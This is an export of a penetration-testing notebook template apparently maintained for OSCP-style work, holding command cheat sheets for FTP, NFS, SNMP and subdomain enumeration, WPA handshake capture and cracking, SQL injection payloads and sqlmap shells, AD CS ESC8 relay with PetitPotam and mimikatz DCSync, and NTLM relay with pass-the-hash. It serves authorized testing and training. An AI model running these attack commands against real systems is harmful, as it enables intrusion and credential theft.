TJ-Pentest-Template-4.0.jex

008bf10b237d494db05d2270f21864df.md000644 0000000605 14666154175012450 0ustar00000000 000000 Host Scans

id: 008bf10b237d494db05d2270f21864df
created_time: 2024-09-04T21:42:12.021Z
updated_time: 2024-09-04T21:43:26.118Z
user_created_time: 2024-09-04T21:42:12.021Z
user_updated_time: 2024-09-04T21:43:26.118Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 26f9a46140514afbb90702f455a97f5d
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 200e93baf5ae1461f89483aa1e43ff225.md000644 0000003665 14666154175012631 0ustar00000000 000000 Sniffing the network

# "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to"


## tcpdump

- tcpdump -i eth0
- tcpdump -c -i eth0
- tcpdump -A -i eth0
- tcpdump -w 0001.pcap -i eth0
- tcpdump -r 0001.pcap
- tcpdump -n -i eth0
- tcpdump -i eth0 port 22
- tcpdump -i eth0 -src 172.21.10.X
- tcpdump -i eth0 -dst 172.21.10.X


## tshark

General Options:
- tshark --list-interfaces
- tshark -i interface
- tshark -i interface -w capture.pcap
- tshark -i interface -r capture.pcap # reading a pcap file

Filtering Protocols:
- tshark -i interface -Y "http || dns || tcp"
- tshark -i interface -Y "http && tcp"
- tshark -i interface -Y "http || dns"

Filtering IP address:
- tshark -i interface -Y "ip.src == 172.21.0.0"
Destination: 
- tshark -i interface -Y "ip.dst == 172.21.0.0"
Either Source or Destination: 
- tshark -i interface -Y "ip.addr == 172.21.0.0"
Both Source and Destination: 
- tshark -i interface -Y "(ip.src == 172.21.0.0 && ip.dst == 172.21.0.0) || (ip.src == 172.21.0.0 && ip.dst == 172.21.0.0)"
IP Range:
- tshark -i interface -Y "ip.addr == 172.21.0.0/24"
Using Filters and IP Addresses: 
- tshark -i interface -Y "ip.src == 172.21.0.0 && http"

## Dumpcap
- dumpcap -i interface -w capture.cap

## Other tools to capture and analyze packets: 

- Wireshark
- Snort
- Suricata
- Zeek







id: 00e93baf5ae1461f89483aa1e43ff225
parent_id: 26f9a46140514afbb90702f455a97f5d
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-08-06T04:13:10.072Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132078
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-08-06T04:13:10.072Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 102b2aa03bf934f6cbdc39bb1ea864b9c.md000644 0000002262 14666154175013110 0ustar00000000 000000 General Notes Linux

## Debian:

- ls -alh /usr/bin/
- ls -alh /sbin/
- dpkg -l
- ls -alh /var/cache/apt/archivesO
- ls /usr/share/applications | awk -F '.desktop' ' { print $1}' -

## RedHat:

- rpm -qa
- ls -alh /var/cache/yum/


## BSD:

- pkg_info

## Gentoo:

- equery list 
- eix -I

## Arch Linux:

- pacman -Q


## Bash Script:

```
#!/bin/bash
IFS=: read -ra dirs_in_path <<< "$PATH"

for dir in "${dirs_in_path[@]}"; do
    for file in "$dir"/*; do
        [[ -x $file && -f $file ]] && printf '%s\n' "${file##*/}"
    done
done
```

id: 02b2aa03bf934f6cbdc39bb1ea864b9c
parent_id: 45b2694a52b149c982a159cccb1c6a2b
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132637
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1061472ca214a41dbbd5a08fa5a4142bd.md000644 0000003532 14666154175012644 0ustar00000000 000000 Enumerating FTP

# General Notes: 
Always try anonymous login if it is available: 

Username: anonymous
Password: anonymous (or keys you want to put in.)

# FTP Enumeration Tools
## Manual Connection
```
$ ftp 172.21.0.0
```
```
$ nc -vn 172.21.0.0 21
```
## Connect via Browser
```
ftp://172.21.0.0
```

## Nmap FTP Enumeration
```
$ ls -lh /usr/share/nmap/scripts/ | grep ftp
-rw-r--r-- 1 root root 4.5K Oct 12 09:29 ftp-anon.nse
-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-bounce.nse
-rw-r--r-- 1 root root 3.1K Oct 12 09:29 ftp-brute.nse
-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-libopie.nse
-rw-r--r-- 1 root root 3.3K Oct 12 09:29 ftp-proftpd-backdoor.nse
-rw-r--r-- 1 root root 3.7K Oct 12 09:29 ftp-syst.nse
-rw-r--r-- 1 root root 5.9K Oct 12 09:29 ftp-vsftpd-backdoor.nse
-rw-r--r-- 1 root root 5.8K Oct 12 09:29 ftp-vuln-cve2010-4221.nse
-rw-r--r-- 1 root root 5.7K Oct 12 09:29 tftp-enum.nse
$ nmap x.x.x.x -p 21 -sV --script=exampleScript1.nse,exampleScript2.nse
```

## Netexec

```
- netexec ftp 172.21.0.0
- netexec ftp 172.21.0.0 -u 'a' -p ''
- netexec ftp 172.21.0.0 -u 'anonymous' -p '''

# FTP Default wordlists: 
/usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt

```


id: 061472ca214a41dbbd5a08fa5a4142bd
parent_id: 4ea66ebc33d64a02880510457f803025
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-09-04T04:33:00.787Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132160
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-09-04T04:33:00.787Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1093754dfb210438daea7f47bcbc84e15.md000644 0000002062 14666154175012702 0ustar00000000 000000 Domain Sub Domain Discovery

# Domain Discovery

Sublis3r:

- Sublist3r -d www.example.com
- Sublist3r -v -d www.example.com -p 80,443

Subfinder: 
- subfinder -d megacorpone.com

OWASP AMASS: 

- amass enum -d www.example.com
- amass intel -whois -d www.example.com
- amass intel -active 172.21.0.0-64 -p 80,443,8080,8443
- amass intel -ipv4 -whois -d www.example.com
- amass intel -ipv6 -whois -d www.example.com

id: 093754dfb210438daea7f47bcbc84e15
parent_id: 204bf6446e68480f8aa4bc2e58bca732
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-09-04T05:36:30.039Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132005
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-09-04T05:36:30.039Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 10ba4204efa69438eadb20eb752fa86e1.md000644 0000005703 14666154175012756 0ustar00000000 000000 9. ESC8 Certificate Templates

# General Overview: 
AD CS supports several HTTP-based enrollment methods if additional server roles are installed (Certificate enrollment web service). There are three methods that can test to abuse this technique.

An attacker can use PetitPotam to force a Domain Controller to relay its NTLM credentials to a target host. These credentials can then be forwarded to the Active Directory Certificate Services (AD CS) Web Enrollment pages, allowing the attacker to enroll for a Domain Controller certificate. This certificate can be used to request a Ticket Granting Ticket (TGT), enabling a Pass-the-Ticket attack that compromises the entire domain.

# # Abusing ESC8 Certificate Templates

## Scenario 1 (Certipy, NTLMrelayx, PetitPotman):
- certipy-ad relay -ca 172.21.1.1
- impacket-ntlmrelayx -t http://megacorpone.com/certsrv/csertfnsh.asp -smb2support --adcs --template 'Domain Controller'
- python3 PetitPotam -d megacorpone.com -u afsimmons -p Spawn123! 172.21.1.5 MEGACORP
## Scenario 2: 
- impacket-ntlmrelayx -t http://megacorpone.com/certsrv/csertfnsh.asp -smb2support --adcs --template 'Domain Controller'
- mimikatz> misc::efs /server:dc.lab.local /connect:172.21.1.5 /noauth
-  kekeo> base64 /input:on
- kekeo> tgt::ask /pfx:"BASE64-CERT-FROM-NTLMRELAY" /user:dc$ /domain:megacorpone.com /ptt
- mimikatz> lsadump::dcsync /user:krbtgt
## Scenario 4:
- sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
- sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v
## Scenario 5:
- Source: https://github.com/bats3c/ADCSPwn
- adcspwn.exe --adcs "cs server" --port [local port] --remote [computer]
- adcspwn.exe --adcs cs.megacorpone.com
- adcspwn.exe --adcs cs.megacorpone.com--remote dc.megacorpone.com--port 9001
- adcspwn.exe --adcs cs.megacorpone.com--remote dc.megacorpone.com --output C:\Temp\cert_b64.txt
- adcspwn.exe --adcs cs.megacorpone.com--remote dc.megacorpone.com--username megacorpone.com\afsimmons --password Spawn123! --dc dc.megacorpone.com
## Scenario 6: 
 - impacket-ntlmrelayx -t http://megacorpone.com/certsrv/csertfnsh.asp -smb2support --adcs --template 'Domain Controller'
 - python3 coercer.py <DC_IP> <YOUR_IP>
 - python3 getTGT.py -dc-ip <DC_IP> -pfx <CERT_FILE.pfx> -no-pass

id: 0ba4204efa69438eadb20eb752fa86e1
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-08-30T18:42:49.732Z
updated_time: 2024-08-31T04:29:35.205Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132287
user_created_time: 2024-08-30T18:42:49.732Z
user_updated_time: 2024-08-31T04:29:35.205Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 113b33238c3094b0fbe9826b31840833d.md000644 0000001664 14666154175012323 0ustar00000000 000000 General Notes Linux

## For all Linux Distro's:

- uname -a
- cat /etc/issue
- cat /proc/version
- cat /etc/os-release

## PowerShell 

- $PSVersionTable

Obtaining Systems Environment Variables:

- Get-ChildItem -Path Env:

## Debian:

- dmesg | grep Linux

## RedHat:

- rpm -q kernel



id: 13b33238c3094b0fbe9826b31840833d
parent_id: 8f6442e342044bd785c48bacc2e7658e
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-08-01T20:38:07.068Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132754
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-08-01T20:38:07.068Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 116a6ff522b424215baef18e3bac85914.md000644 0000003270 14666154175012615 0ustar00000000 000000 Cracking WEP_WPA_WPA 2 PSK Authetication

## Capture Handshake

1. airmon-ng start wlan0
2. airodump-ng mon0 --write capture.cap -c 11
3. aireplay-ng --deauth 0 -a bb:bb:bb:bb:bb:bb mon0

Convert pcap files for john and hashcat

/usr/lib/hashcat-utils/cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
/usr/sbin/hccap2john
/usr/sbin/vncpcap2john
/usr/sbin/wpapcap2john


## Cracking Handshake with Aircrack

- aircrack-ng -w /usr/share/wordlist/fasttrack.txt 0001.cap

## Cracking Handshakes with Hashcat

- hashcat.exe -m 2500 capture.hccapx rockyou.txt (Dictionary Attack)
- hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d (Brute-Force)
- hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt (Rule-Based)

## Cracking Handshakes with John The Ripper

Did you run hccap2john?

- john --format=wpapsk --wordlist=/usr/share/wordlists/rockyou.txt crackmecap
- john --format=wpapsk-opencl --wordlist=/usr/share/wordlists/rockyou.txt crackmecap



Other Resources: 

https://github.com/lgandx/PCredz 

id: 16a6ff522b424215baef18e3bac85914
parent_id: f5b6f52827df4dfd8523222cd85dcaa6
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132848
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 119e51b6eb70d45a585157dd8ed232927.md000644 0000005361 14666154175012503 0ustar00000000 000000 BloodHound

# BloodHound

###Source: 

- https://github.com/BloodHoundAD/BloodHound

## In Kali: 
```
$ sudo apt install bloodhound
$ bloodhound 
```
## Installing:
New version of bloodhound:
```
$ cd /opt
$ sudo apt install docker docker-compose
$ sudo git clone https://github.com/SpecterOps/BloodHound
$ cd /opt/BloodHound
$ docker compose -f - up

Navigate to http://localhost:8080/ui/login
```

Old version of bloodhound: 
```
$ cd /opt
$ sudo git clone https://github.com/BloodHoundAD/BloodHound.git
$ sudo wget https://github.com/BloodHoundAD/BloodHound/releases/download/3.0.3/BloodHound-linux-x64.zip
```

Neo4j has to be running for Bloodhound web app to work:
```
$ sudo neo4j console
```
Set the password if you haven't already. 

Start bloodhound:
```
$ sudo ./Bloodhound --no-sandbox
```

## Pre-Compiled Binaries

- https://github.com/BloodHoundAD/BloodHound/releases

## SharpHound: 

- https://github.com/BloodHoundAD/SharpHound3

Execute on target:
```
C:\> .\SharpHound.exe -c all
```
or in Powershell with .ps1 version

```
C:\> import-module .\sharphound.ps1
C:\> invoke-bloodHound -CollectionMethod all -domain <target-domain> -LDAPUser <username> -LDAPPass <password>
```
Note: `-domain`, `-LDAPUser`, and `-LDAPPass` are optional and bloodhound will run with only the `-CollectionMethod` flag. 

Other useful sharphound flags:
- `--encryptzip`: allows you to encrypt the file using a random password 
- `--zipfilename`: allows you to name the outputted filename so that "bloodhound" isn't in the name in case AV catches it.

If you want to run SharpHound from a PC that is not joined to the target domain, open a command prompt and run:
```
C:\> runas /netonly /user:DOMAIN\USER powershell.exe
```
Then run the PS commands listed above as the domain user in the PowerShell context.

### Bloodhound for python 

## In Kali: 
Source: https://github.com/fox-it/BloodHound.py
Note: Only compatible with BloodHound 3.0 or newer

Installation in Kali: 
```
sudo apt install bloodhound.py
```

Collecting information: 
```
bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
```





id: 19e51b6eb70d45a585157dd8ed232927
parent_id: 533f89ee69a545b7a416b814f14e5d3d
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-09-04T05:34:14.155Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132521
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-09-04T05:34:14.155Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 11c469d0205e349b1901a6eabc6814e09.md000644 0000010620 14666154175012452 0ustar00000000 000000 General Information

Created by TJ Null:

Twitter: https://twitter.com/TJ_Null
Github: https://github.com/tjnull

Contribution: 

If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here:
- https://github.com/tjnull/TJ-JPT

## Changelog:

v1.0: Original Template

v2.0 The first chapter

2. Enumeration 
- Added an FTP Notebook to include notes for that identified service
- Added more content in Active Directory
- Web has a subnotebook to include any content from the changelog.txt file
- Fixed the gobuster oneliners to match with the recent changes from the tool

3. Exploitation
- Added some custom options for searchsploit

4. Post Exploitation
- Moved the subnotebook into a subnotebook (Target #1) so the user can copy the subnotebook and add another one under post exploitation for other targets. 
- Created a sub notebook to include the output from automated priv esc scripts that are used.
- Included tools, tips, and resources in all sections for priv esc

v3.0 Major Refactoring Overhaul
- Added sub notebooks (Recon Targets, Enumeration Targets, Exploitation Targets, Post Exploitation Targets). Makes it easier to organize all of the notes you have for assessing the targets instead of having them cluttered in your other notes.
- Broke down the recon notes to include a discovery and a host scan sub notebooks
- Moved Pivot/Tunneling into the Recon Notes Section. [Pivoting/Tunneling](../Pentest%20Template%20Master%203.0/1.%20Recon%20Notes/Pivoting_Tunneling.md)
- Moved Reporting into High Value Information/Reporting SubNotebook 
- New section for impacket ntlmrelayx [Impacket NtlmRelayX](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Impacket%20NtlmRelayX.md)
- New section for pretender [Pretender](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Pretender.md)
- New section or clean up with responder [Responder](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Responder.md)
- New section including how to use villian [Villian Cheatsheet](../Pentest%20Template%20Master%203.0/5.%20Exploitation%20Notes/Villian%20Cheatsheet.md)
- New section for editable services [General Notes](../Pentest%20Template%20Master%203.0/7.%20Post%20Exploitation/Editable%20Services/General%20Notes.md)
- Added a new PWK V2/V3 OSCP Report Template [OSCP Report Template V2](../Pentest%20Template%20Master%203.0/9.%20High%20Value%20Information_Reporting/Reporting/OSCP%20Report%20Template%20V2.md)
- Added a PowerShell ISO oneliner if you want to launch your payloads through an ISO [General Notes](../Pentest%20Template%20Master%203.0/5.%20Exploitation%20Notes/General%20Notes.md)


Shoutout to TheGetch (https://github.com/TheGetch) for sharing some of his notes and giving me some inspiration to the hierarchy he has. 

If you want to see his current methodology you can find it here: https://github.com/TheGetch/Penetration-Testing-Methodology

v4.0  Dusting off the books

- Refactored and cleaned up noting structure to align with how Obsidian displays raw markdown. 
- Separated the Pivoting-Tunneling section to show a set of commands to use for either Windows or Linux.
- Added a new section to enumerate email services. 
- Included two scripts (Python & Golang) to with instructions on how you can send a mass email for phishing campaigns.
- New section for using Rustscan
- New section for using SQLMap
- New section for enumerating websites with Feroxbuster
- New section on enumerating and exploiting AD CS certificates
- Updated Bypassing AV section with new tools
- Updated BloodHound section to include the new version of BloodHound Community
- Updated Mimikatz section
- New Section on Decrypting VNC Passwords
- Replaced all crackmapexec commands with NetExec due to change in contribution of the project. 

id: 1c469d0205e349b1901a6eabc6814e09
parent_id: 209cdc03c015406883ec99e460d27e45
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-09-04T16:03:17.916Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132987
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-09-04T16:03:17.916Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 11da65df8567042b3b7bd3abdcfe93ecc.md000644 0000002601 14666154175013201 0ustar00000000 000000 NFS Enumeration

## Detecting NFS and using NSE scripts:

- nmap -Pn -sV -p 111,2049 --script="banner,(rpcinfo or nfs*) and not (brute or broadcast or dos or external or fuzzer)" 172.21.1.5 -oA results.txt
## Mounting NFS Shares: 

- sudo mount -o rw,vers=2 $ip:/home /mnt

Note: '-o nolock' used to disable file locking, needed for older NFS servers
- sudo mount -o nolock $ip:/home /mnt/


# Useful Scripts to Enumerate NFS:

## nmap

```
nfs-ls #List NFS exports and check permissions
nfs-showmount #Like showmount -e
nfs-statfs #Disk statistics and info from NFS share
```

## Metasploit

```
scanner/nfs/nfsmount #Scan NFS mounts and list permissions
```

# Tools to enumerate NFS:

## nfsclient: 

- Source: https://github.com/mubix/nfsclient


id: 1da65df8567042b3b7bd3abdcfe93ecc
parent_id: 5d5883588bb347e790e78733ca62cc4c
created_time: 2024-09-04T05:47:02.143Z
updated_time: 2024-09-04T15:12:49.056Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132381
user_created_time: 2024-09-04T05:47:02.143Z
user_updated_time: 2024-09-04T15:12:49.056Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 11ebe77a4855a4b90920c7351987b1806.md000644 0000001334 14666154175012336 0ustar00000000 000000 Target

# Fill in results or other information about your targets here: 

id: 1ebe77a4855a4b90920c7351987b1806
parent_id: 5f61396aff534f70804351e1db59cc7b
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132941
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1204bf6446e68480f8aa4bc2e58bca732.md000644 0000000612 14666154175012623 0ustar00000000 000000 Discovery Scans

id: 204bf6446e68480f8aa4bc2e58bca732
created_time: 2024-09-04T21:42:11.990Z
updated_time: 2024-09-04T21:57:26.277Z
user_created_time: 2024-09-04T21:42:11.990Z
user_updated_time: 2024-09-04T21:57:26.277Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 26f9a46140514afbb90702f455a97f5d
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2209cdc03c015406883ec99e460d27e45.md000644 0000000566 14666154175012415 0ustar00000000 000000 Pentest Template Master 4.0

id: 209cdc03c015406883ec99e460d27e45
created_time: 2024-09-04T21:42:11.970Z
updated_time: 2024-09-04T21:42:11.970Z
user_created_time: 2024-09-04T21:42:11.970Z
user_updated_time: 2024-09-04T21:42:11.970Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 221665884f17c41eab0959b721b09bc8e.md000644 0000004562 14666154175012501 0ustar00000000 000000 SQL Injection

Testing for Bypasses: 

' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -

# SQLMAP

## Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs

## Enumerate tables
- sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

## Dump table data
- sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
## Dump Columns
- sqlmap --dbms=mysql -u https://megacorpone.com -D "DATABASE" -T "TABLE" -C "COLUMN" --dump
## List Columns
- sqlmap --dbms=mysql -u https://megacorpone.com -D "DATABASE" -T "TABLE" --columns
## Specify parameter to exploit
- sqlmap --dbms=mysql -u "http://www.megacorpone.com/param1=value1&param2=value2" --dbs -p param2

##  Specify parameter to exploit in 'nice' URIs
- sqlmap --dbms=mysql -u "http://www.megacorpone.com/param1/value1*/param2/value2" --dbs # exploits param1

## Get OS shell
- sqlmap --dbms=mysql -u "$URL" --os-shell

## Get SQL shell
- sqlmap --dbms=mysql -u "$URL" --sql-shell

## SQL query
- sqlmap --dbms=mysql -u https://megacorpone.com -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"

## Use Tor Socks5 proxy
- sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u https://megacorpone.com --dbs
## Using SQLMAP with basic authentication or NTLM
- sqlmap -u "http://megacorpone.com/" -s-data=param1=value1&param2=value2 -p param1 --auth-type=[basic/ntlm] --auth-cred=username:password
# SQLI

Testing for a row: 

- http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8
# Resources: 
- http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html
- https://cheatography.com/dormidera/cheat-sheets/oracle-sql-injection/
- https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

id: 21665884f17c41eab0959b721b09bc8e
parent_id: 683f633e9ae24821b9411611851581bd
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-09-04T04:29:09.535Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132366
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-09-04T04:29:09.535Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 12249fabab1d0414a83f514636b4210eb.md000644 0000006122 14666154175012513 0ustar00000000 000000 Impacket NtlmRelayX

# Utilizing Sock sessions with Responder and NtlmRelayX

```
ntlmrelayx> socks
Protocol  Target          Username                  Port
--------  --------------  ------------------------  ----
SMB       172.21.48.38   SPAWN/MSIMMONS            445
MSSQL     172.21.48.230  FAERIE/ADMINISTRATOR      1433
MSSQL     172.21.48.230  FAERIE/ROOT               1433
SMB       172.21.48.230  FAERIE/ADMINISTRATOR      445
SMB       172.21.48.230  FAERIE/ALSIMMONS          445
SMTP      172.21.48.225  FAERIEEXCHANGE/SBURKE     25
SMTP      172.21.48.225  FAERIEEXCHANGE/TWILLIAMS  25
IMAP      172.21.48.225  FAERIEEXCHANGE/TMCFARLANE 143
```

# Testing Sock Access from NtlmRelayX: 

## SMB:
Using SMBExec:
- proxychains4  impacket-smbexec SPAWN/MSIMMONS@172.21.48.38
- proxychains4  smbexec.py SPAWN/MSIMMONS@172.21.48.38
Using Smbclient
- proxychains4 impacket-smbclient SPAWN/MSIMMONS@172.21.48.38
- proxychains4 smbclient.py SPAWN/MSIMMONS@172.21.48.38

## Secrets Dump
- proxychains4  impacket-secretsdump SPAWN/MSIMMONS@172.21.48.38
- proxychains4  secretsdump.py SPAWN/MSIMMONS@172.21.48.38

## Pass The Hash:
If you obtain hashes from ntlmrelayx you can use the ntlm hash to gain access to a target using the following scripts or tools: 

Impacket Wmiexec:
- impacket-wmiexec -hashes ' INSERT HASH HERE' administrator@172.21.48.230
- wmiexec.py -hashes ' INSERT HASH HERE' administrator@172.21.48.230

Evil-WinRM:
- evil-winrm -u Administrator -H 'INSERT HASH HERE' -i 172.21.48.230

XfreeRDP: 
- xfreerdp /u:Administrator /pth:'INSERT HASH HERE' /v:172.21.48.230

# Other NtlmRelayX Commands: 
## In Kali:
### SMB
- impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt -c <Stager/Stageless Payload>
- impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt -c whoami
### Ldap
- impacket-ntlmrelayx -t ldap://dc.domain.local --shadow-credentials --shadow-target target\$

## Python Impacket: 
### SMB
- ntlmrelayx.py -socks -smb2support -tf smb-targets.txt -c <Stager/Stageless Payload>
- ntlmrelayx.py -tf smb-targets.txt -c whoami
### LDAP
- ntlmrelayx.py -t ldap://dc.domain.local --shadow-credentials --shadow-target target\$

# References: 
- https://www.hackingarticles.in/a-detailed-guide-on-responder-llmnr-poisoning/
-  https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0
-  https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
- https://www.offsec-journey.com/post/attacking-ms-sql-servers

id: 2249fabab1d0414a83f514636b4210eb
parent_id: ab4c6b72385d4d8db33ad00069267585
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-08-07T16:51:12.189Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132127
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-08-07T16:51:12.189Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 12385ee602a604722bb401825d10fcdac.md000644 0000005251 14666154175012517 0ustar00000000 000000 General Notes

## SNMP Walk: 


- snmpwalk -c public -v1 ipaddress 1
- snmpwalk -c private -v1 ipaddress 1
- snmpwalk -c manager -v1 ipaddress 1


## Nmap Enumeration: 

